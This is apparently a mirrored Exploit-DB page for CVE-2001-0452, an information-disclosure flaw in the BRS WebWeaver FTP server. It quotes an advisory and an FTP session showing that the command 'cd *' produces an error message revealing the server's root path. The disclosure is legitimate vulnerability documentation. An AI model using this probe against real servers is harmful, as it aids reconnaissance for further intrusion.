- 34,644
- 0
- 18 Дек 2022
- 20819
- Проверка EDB
- Пройдено
- Автор
- Тип уязвимости
- Платформа
- cve-2001-0452
- Дата публикации
- 2001-04-28
source: https://www.securityfocus.com/bid/2676/info
BRS WebWeaver is an ftpd and webserver from Blaine Southam.
WebWeaver's FTP component has a flaw which can permit a remote user to learn the physcial path to the FTP service's root directory.
By submitting the FTP command CD argumented by an asterisk character, the attacker can cause an error message to be generated by WebWeaver which includes the path for the ftp root.
Properly exploited, this information could assist a hostile user in carrying out other attacks on the system.
>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
- Источник
- www.exploit-db.com